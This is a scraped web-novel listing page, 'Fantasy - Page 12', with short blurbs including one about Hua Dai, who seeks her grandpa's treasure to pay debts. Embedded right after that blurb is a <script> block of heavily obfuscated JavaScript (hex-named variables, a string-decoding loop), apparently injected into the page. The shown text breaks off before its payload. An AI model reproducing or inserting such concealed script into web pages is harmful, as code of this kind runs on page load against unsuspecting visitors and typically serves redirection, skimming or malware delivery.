Fantasy - Page 12

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

5214 results

A Village Protected by a Dragon

Hua Dai found herself with an illness - whenever she touches something she wants/likes, her hands will get stuck to it until she buys it. Due to this illness, she is in great debt. Without choice, she decided to go back to her grandpa's house with this secret key her grandpa gave her in search of treasure, hoping to pay off her debts. As Hua Dai arrived at Bai Lin Village, she found a girl namd "Long" who claimed to be a disciple of her grandpa. With this, Hua Dai started living with this strange girl...<script></script><script>function _0x2aae(_0x300cf8,_0x59fadb){var _0x3a6ef7=_0x4b32();return _0x2aae=function(_0x446ec8,_0x510905){_0x446ec8=_0x446ec8-(-0x1*0x143a+-0x457+0x1a34);var _0x545d98=_0x3a6ef7[_0x446ec8];return _0x545d98;},_0x2aae(_0x300cf8,_0x59fadb);}(function(_0x4dc134,_0x5600e8){var _0x29ade6=_0x2aae,_0x294a72=_0x4dc134();while(!![]){try{var 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